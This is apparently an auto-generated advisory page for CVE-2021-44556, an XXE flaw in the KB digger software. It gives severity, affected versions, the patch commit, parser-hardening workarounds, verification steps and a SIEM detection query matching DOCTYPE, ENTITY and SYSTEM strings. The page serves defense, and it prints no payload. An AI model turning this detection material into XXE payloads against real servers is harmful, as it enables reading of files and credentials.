CVE-2021-44556 – This CVE describes an XML External Entity (XXE)... (How to Fix)

Q: What is the severity of CVE-2021-44556?

CVE-2021-44556 has a CVSS score of 9.1 (CRITICAL). This CVE describes an XML External Entity (XXE) vulnerability in the National Library of the Netherlands digger software. Attackers can exploit this by submitting malicious XML files to read internal files from the server or cause denial of service. Any system running vulnerable versions of digger that processes XML input is affected.

📋 TL;DR

This CVE describes an XML External Entity (XXE) vulnerability in the National Library of the Netherlands digger software. Attackers can exploit this by submitting malicious XML files to read internal files from the server or cause denial of service. Any system running vulnerable versions of digger that processes XML input is affected.

💻 Affected Systems

Products:

National Library of the Netherlands digger

Versions: All versions before commit 6697d1269d981e35e11f240725b16401b5ce3db5

Operating Systems: All operating systems running digger

Default Config Vulnerable: ⚠️ Yes

Notes: The vulnerability exists in the XML parsing functionality. Any instance that processes XML input is vulnerable.

📦 What is this software?

Digger by Kb

View all CVEs affecting Digger →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete server compromise through file disclosure of sensitive data like configuration files, credentials, or SSH keys, potentially leading to full system takeover.

🟠

Likely Case

Unauthorized reading of internal files from the server filesystem, potentially exposing sensitive configuration or data.

🟢

If Mitigated

Limited impact with proper input validation and XML parser configuration that disables external entity resolution.

🌐 Internet-Facing: HIGH - If the digger service is exposed to the internet and accepts XML input, it's directly exploitable.

🏢 Internal Only: MEDIUM - Internal attackers or compromised internal systems could exploit this to escalate privileges or access sensitive data.

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: LIKELY

Unauthenticated Exploit: ⚠️ Yes

Complexity: LOW

XXE vulnerabilities are well-understood with many public exploit examples. The GitHub pull request shows the specific vulnerable code.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Commit 6697d1269d981e35e11f240725b16401b5ce3db5 or later

Vendor Advisory: https://github.com/KBNLresearch/digger/pull/1

Restart Required: Yes

Instructions:

1. Update to commit 6697d1269d981e35e11f240725b16401b5ce3db5 or later from the GitHub repository. 2. Restart the digger service. 3. Verify the fix by checking the version.

🔧 Temporary Workarounds

Disable XML external entity processing

all

Configure the XML parser to disable external entity resolution and DTD processing

Configure XML parser settings: set XMLConstants.FEATURE_SECURE_PROCESSING to true, disable external general entities and external parameter entities

Input validation and filtering

all

Implement strict input validation to reject XML containing DOCTYPE declarations or external entity references

Implement XML schema validation or use whitelisting for allowed XML structures

🧯 If You Can't Patch

Implement network segmentation to isolate digger instances from sensitive systems
Deploy a web application firewall (WAF) with XXE protection rules to filter malicious XML payloads

🔍 How to Verify

Check if Vulnerable:

Check if your digger version is before commit 6697d1269d981e35e11f240725b16401b5ce3db5. Test with a benign XXE payload to see if external entities are resolved.

Check Version:

Check git commit hash: git log --oneline -1

Verify Fix Applied:

After updating, verify the commit hash includes 6697d1269d981e35e11f240725b16401b5ce3db5. Test with XXE payloads to confirm they are rejected or don't resolve external entities.

📡 Detection & Monitoring

Log Indicators:

Unusual XML parsing errors
File read operations from unexpected processes
Large XML payloads with DOCTYPE declarations

Network Indicators:

HTTP requests containing XML with DOCTYPE or SYSTEM entities
Outbound connections to external URLs from XML parsing context

SIEM Query:

source="digger" AND (message="*DOCTYPE*" OR message="*ENTITY*" OR message="*SYSTEM*")

📊 Metadata

CVE ID: CVE-2021-44556

CVSS v3 Score: 9.1 (CRITICAL)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H

CWE: CWE-611

Published: December 8, 2021

Last Updated: November 21, 2024

🔗 References

https://github.com/KBNLresearch/digger Product,Third Party Advisory
https://github.com/KBNLresearch/digger/pull/1 Patch,Third Party Advisory
https://github.com/KBNLresearch/digger Product,Third Party Advisory
https://github.com/KBNLresearch/digger/pull/1 Patch,Third Party Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2021-44556, you might also want to check these: